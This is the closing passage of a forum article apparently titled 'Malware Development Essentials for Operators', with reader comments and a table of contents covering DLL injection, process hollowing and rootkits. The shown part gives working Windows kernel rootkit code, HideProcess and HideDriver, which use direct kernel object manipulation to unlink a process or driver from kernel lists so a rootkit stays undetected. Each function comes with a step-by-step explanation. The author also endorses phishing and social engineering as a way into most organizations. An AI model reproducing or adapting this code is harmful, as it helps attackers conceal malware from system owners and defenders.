    PEPROCESS currentEProcess = PsGetCurrentProcess();
    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;
    
    // Get the offsets for UniqueProcessId and ActiveProcessLinks
    ULONG uniqueProcessIdOffset = FIELD_OFFSET(EPROCESS, UniqueProcessId);
    ULONG activeProcessLinksOffset = FIELD_OFFSET(EPROCESS, ActiveProcessLinks);
    
    ULONG currentPid;
    
    do {
        // Check if the current process ID is the one to hide
        RtlCopyMemory(&currentPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
        if (currentPid == pid) {
            // Remove the process from the list
            LIST_ENTRY* blink = currentList->Blink;
            LIST_ENTRY* flink = currentList->Flink;
            blink->Flink = flink;
            flink->Blink = blink;
            return STATUS_SUCCESS;
        }
        
        // Move to the next process
        currentList = currentList->Flink;
        currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
    } while (currentList != &currentEProcess->ActiveProcessLinks);
    
    return STATUS_NOT_FOUND;  // Process not found
}

HideProcess, which hides a process using the DKOM technique. It takes the Process ID (PID) of the target process as an argument. Here’s how it works:

It starts by obtaining the current EPROCESS structure for the executing driver using PsGetCurrentProcess.
The code then retrieves the offsets within the EPROCESS structure for UniqueProcessId and ActiveProcessLinks.
It iterates through the list of active processes, comparing the PID of each process with the target PID. When it finds a match, it unlinks the process from the ActiveProcessLinks list, effectively hiding it.
The function returns STATUS_SUCCESS if it successfully hides the process. If the target process is not found, it returns STATUS_NOT_FOUND.

Hiding a Driver

In addition to hiding processes, we can also employ the DKOM technique to hide drivers from the system. This is particularly useful in scenarios where a rootkit needs to remain undetected

// Function to hide a driver by manipulating data structures
NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
    KIRQL irql;
    
    // Raise IRQL to DPC level
    irql = KeRaiseIrqlToDpcLevel();
    
    // Get the module entry from the DriverObject
    PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;
    
    // Unlink the module entry
    moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
    moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;
    
    // Lower IRQL back to its original value
    KeLowerIrql(irql);
    
    return STATUS_SUCCESS;
}

HideDriver function is designed to hide a driver by manipulating kernel data structures. Here’s a breakdown of how it works:

It raises the IRQL (Interrupt Request Level) to DPC (Deferred Procedure Call) level using KeRaiseIrqlToDpcLevel. This is essential to ensure that the manipulation of kernel data structures is performed atomically and doesn’t interfere with ongoing system operations.
Next, it obtains the module entry by casting the DriverSection member of the provided driverObject to a PLDR_DATA_TABLE_ENTRY. This provides access to information about the driver module.
It unlinks the module entry from the kernel’s internal linked lists. By manipulating the InLoadOrderLinks member of the module entry, it effectively removes the driver from the list of loaded modules.
Finally, it lowers the IRQL back to its original value using KeLowerIrql, allowing normal system operation to resume.

Conclusion

Thank you for reading, and I hope you’ve learned something from this. We’ve covered a lot of topics. I removed the shellcode development section to keep things simpler, which I may cover in a separate article. I’ve included great resources that helped create this article. Remember,

" Social engineering and phishing, combined with some operative knowledge about windows hacking, should be enough to get you inside the networks of most organization"

References and Credits

Anatomy of the Process Environment Block (PEB) (Windows Internals

Manipulating Active processlinks

DLL Injection

Kernel Mode Rootkits

Enumerating RWX Protected Memory Regions for Code Injection

Windows APT Warfare

c0mrade · November 8, 2023, 9:26am

I could download this as a pdf or something

messede · November 8, 2023, 4:12pm

another excellent piece.

cicada · November 8, 2023, 7:03pm

Now THIS is excellent content

vict0ni · November 9, 2023, 9:05am

you can do ctrl + P and save the file as a pdf

ATreeShine · November 13, 2023, 2:05pm

That’s amazing, thanks.

Secey · November 16, 2023, 8:16am

This article is impressive,thanks.

EG1116 · November 18, 2023, 4:01pm

Thanks for your thread.

initfs · March 7, 2024, 3:16am

This is so dense, so obviously this left me with some questions:

How the rootkit its installed, I mean, in linux you have lkm system but on windows what?
The rootkit for windows 7 could be run in windows 10? if not how modify the code to make it compatible? in linux you can explore the code, so you have a very clear picture of what happened in what version but the windows kernel is more obscure
I read from an article about writing rootkits the next thing:

All you need is do is learn assembly and C/C++ programming, plus exploit development, reverse engineering, and Windows internals, and then find and abuse a buggy driver, and inject and install your rootkit, and bam.

article

is this true?

Your content is so advance, I like it so much, but I still feel it like is more about the “what” and not the “why”, so at the end I just know how to do the things but I do not comprehend it.

system · March 8, 2024, 6:33pm

This topic was automatically closed after 121 days. New replies are no longer allowed.

Malware Development Essentials for Operators

Introduction

Dynamic Function Loading and Execution

PEB Structure

Dynamic Function Loading (IAT Hooking)

Process Hollowing

DLL injection Techniques

LoadLibraryA()

Jumping to DllMain (or another entry point)

Attaching to the Process

DLL Path

Full DLL

DLL Path

Full DLL

Determining our Execution Starting Point

DLL Path and LoadLibraryA()

Full DLL and Jump to DllMain

Executing the DLL!

CreateRemoteThread()

NtCreateThreadEx()

Shellcode Execution Techniques

Injection

Writing a simple Rootkit

Writing a Windows Device Driver

Understanding I/O Request Packets (IRPs)

Creating a File Handle

Kernel-Mode DLL

Image Load Notification

Unloading the Driver

DLL Injection

DLL Injection via APC

Hide Process

Hiding a Driver

Conclusion

References and Credits

`LoadLibraryA()`

Jumping to `DllMain` (or another entry point)

DLL Path and `LoadLibraryA()`

Full DLL and Jump to `DllMain`

`CreateRemoteThread()`

`NtCreateThreadEx()`